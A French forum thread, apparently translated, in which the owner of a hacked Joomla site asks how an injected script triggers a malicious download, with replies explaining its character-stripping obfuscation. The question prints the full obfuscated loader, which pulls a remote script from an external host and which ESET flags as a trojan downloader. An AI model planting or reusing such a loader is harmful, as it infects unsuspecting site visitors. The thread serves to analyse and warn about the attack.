Mon site web Joomla ! a été piraté à plusieurs reprises. Quelqu'un, d'une manière ou d'une autre, a réussi à injecter les déchets suivants dans la clé php scripts, mais je ne veux pas parler de la configuration de Joomla. Le site n'est pas beaucoup visité (j'ai parfois peur d'être le seul visiteur de ce site...) et je ne me soucie guère de le remettre en service. Je m'en occuperai plus tard.
Ma question est la suivante : comment ces déchets fonctionnent-ils ? Je la regarde et je ne vois pas comment elle peut faire du mal. Ce qu'il fait, c'est qu'il essaie de télécharger un fichier PDF appelé ChangeLog.pdf, qui est infecté par un cheval de Troie et qui, une fois ouvert, bloquera votre Acrobat et causera des ravages sur votre machine. Comment fait-il cela, je ne sais pas, je m'en fiche. Mais comment le morceau de script suivant invoque-t-il le téléchargement ?
<script>/*Exception*/ document.write('<script src='+'h#^(t@)((t$&@p#:)&/!$/)@d$y#^#$n@$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@!t@@($!o@$p(.&@c&)@(o$m)).!$m$)y@(b@e()s&$t$@y&o$&(u#)$x&&^(i)-@^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&o@&^&l^$(l)&y$(#@w!o@!((o#d&^.^#)r$#^u!!$:(#@&8#)(0$8@&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c@o!&^m#&/&(s&$(o!f&!t@&o!!n)&i$&c!.#^^c)!$o@@((m@#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^!a@$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&s@(z(@)^.@)c$&o^m)$)^/#$'.replace(/#|\$|@|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--6f471c20c9b96fed179c85ffdd3365cf-->ESET a détecté ce code comme Trojan JS/TrojanDownloader.Agent.NRO
41 votes
S'il vous plaît, que personne ne s'aventure à vérifier le lien par curiosité !
1 votes
Oui, n'essayez pas de comprendre ce qui se passe, la magie est dans le simple encodage de l'URL et le décodage/parsage ultérieur de la chaîne en utilisant le Replace/RegEx que vous voyez à la fin de la ligne.
13 votes
"morceau de script" ressemblait à tout autre chose, au début.